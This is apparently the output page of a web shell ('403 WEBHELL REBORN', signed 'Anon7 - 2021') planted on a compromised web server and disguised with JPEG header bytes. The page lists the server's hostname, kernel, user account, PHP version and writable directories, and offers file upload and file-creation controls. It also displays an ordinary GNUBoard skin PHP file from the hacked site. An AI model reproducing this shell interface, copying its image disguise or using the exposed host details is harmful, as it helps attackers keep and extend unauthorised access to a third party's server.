ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/skin/board/ziplinekorea_service/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/skin/board/ziplinekorea_service/skin.lib.php
<?
if (!defined("_GNUBOARD_")) exit; // 개별 페이지 접근 불가 

function get_nc_category_option($bo_table, $sca="")
{
    global $g4, $board, $nca, $board_skin_path;
	$nc_category_location   = "./board.php?bo_table=$bo_table&sca=$sca&sfl=wr_10&stx=";

	$arr    = explode("|", $board[bo_category_list]);
    $arr1   = explode("|", $board[bo_10]);
    $key    = array_search($sca, $arr);
    $cate   = explode("^", $arr1[$key]);
	$cnt	= count($cate);

    for ($i=0; $i<count($cate); $i++) {
        if (trim($cate[$i])) {
			if($cate[$i]==$nca)
				 $str .= "<img src='$board_skin_path/img/bullet_subtab.gif' width='6' height='5' align='absmiddle' border='0'>
					 	  <a href='$nc_category_location$cate[$i]&nca=$cate[$i]' style='color:#627BB4;font-weight:bold'>".str_replace('_', ' ', $cate[$i])."</a>&nbsp;";
			else $str .= "<a href='$nc_category_location$cate[$i]&nca=$cate[$i]' style='color:#7D7D7D'>".str_replace('_', ' ', $cate[$i])."</a>&nbsp;";
			$cnt--;
			if($cnt) $str .= "<font color='#B9B9B9'> l </font>&nbsp;";
        }
    }

    return $str;
}
?>

Anon7 - 2021